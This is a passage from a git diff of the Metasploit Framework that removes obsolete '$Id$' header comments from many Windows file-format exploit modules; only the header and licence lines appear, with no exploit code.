be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index e9732cffea..b19626ac79 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index 57da50d708..0f14bd4895 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 286c85880a..8be23ef070 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index c1b15fc9ce..2f007f5a3b 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index 537a2ddca5..43e7bb44a4 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb index f3c37bc3c5..6b121cd9e7 100644 --- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb +++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index 59ce4d9aed..27e8f12282 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 4dadf43f02..d6ecd78cac 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 33204d3635..5a2183ea3e 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb index 747e98ed71..ac991de8fc 100644 --- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb +++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index c64f436420..b0ce32e406 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index 75fae5d2c7..d55033e499 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index 77046403fb..916088f462 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -1,8 +1,4 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index 1f3303934b..2c51c2d35a 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb index 72f412c163..19c8168ac8 100644 --- a/modules/exploits/windows/fileformat/feeddemon_opml.rb +++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index 9d4c07642c..6696027c20 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb index e905b7da55..897330913c 100644 --- a/modules/exploits/windows/fileformat/foxit_title_bof.rb +++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 5125e1d0a4..113d07e126 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/gta_samp.rb b/modules/exploits/windows/fileformat/gta_samp.rb index 8569980220..a4103c5980 100644 --- a/modules/exploits/windows/fileformat/gta_samp.rb +++ b/modules/exploits/windows/fileformat/gta_samp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index ed1c77ce5f..054393ef84 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index ee12e55041..8295791a0b 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index 393389895b..d15483845e 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index aa74b56039..b33b0ef633 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index ac73742e7c..f94285b8e8 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index 9e7d9fff68..8819f805dc 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb index 995afaee94..dc28eb83c3 100644 --- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb +++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb index 18c82de3c2..33a1a30c5b 100644 --- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb +++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index cf307e809b..0f4ced0650 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index f6a05b8047..a8aaaba83b 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index 1f8dbd0d58..c143231544 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index 4442797f0c..78391484f9 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index c966b79daf..3f47b80324 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb index 9c548a7c83..073dd829de 100644 --- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb index b777d37f98..d8f0f163f3 100644 --- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 5645104a92..7c5a716b1d 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb index c53609244e..31b0ac24a0 100644 --- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb +++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb index f574bfc117..118cead5c0 100644 --- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb index b60b700e38..477595c952 100644 --- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb +++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 9e2ae49f5e..36056b85b1 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index 998d27454b..4cdd53cd92 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 554854f50f..40156484ac 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index 1e934ce539..9e8002f843 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb index 785d8a463c..e8171379bd 100644 --- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb +++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb index 46a4fd1ce6..62212bff49 100644 --- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb +++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index 85250916bc..2a411c6242 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb index 87bf6d04be..2fb6a083f4 100644 --- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb +++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index 58db221ce8..062ca5ee5c 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 48f19e9542..5cd2a36269 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 29e74c7c62..847187ed5f 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb index 505353a818..dd15a9fbcf 100644 --- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb index cb988ede4a..a31debb94b 100644 --- a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb index 2030362240..bd4719a344 100644 --- a/modules/exploits/windows/fileformat/tugzip.rb +++ b/modules/exploits/windows/fileformat/tugzip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 255e819b9f..9b1c84afe0 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index ffc550068f..1653e972d6 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index b4b647ca86..cd67978146 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb index 218962a4a8..375aeea09c 100644 --- a/modules/exploits/windows/fileformat/varicad_dwb.rb +++ b/modules/exploits/windows/fileformat/varicad_dwb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index abceeeea88..278ead8e6c 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index 61adc270ab..bd719b081e 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb index 02148ea7be..50128d1455 100644 --- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb +++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index 634076ccfd..f29d7ee608 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb index 2869e3eb69..abbf9e8449 100644 --- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb +++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index 33a362064e..1d536790bc 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb index a93fddc94f..7f8dceb0fc 100644 --- a/modules/exploits/windows/fileformat/vlc_webm.rb +++ b/modules/exploits/windows/fileformat/vlc_webm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index cc23731ecd..3eb4d69ca6 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index cab80ab4d3..4dfc2ffca1 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb index 883bdff2b2..ae165c92bc 100644 --- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb +++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb index 8d712ebc34..3e72999dd0 100644 --- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb +++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git 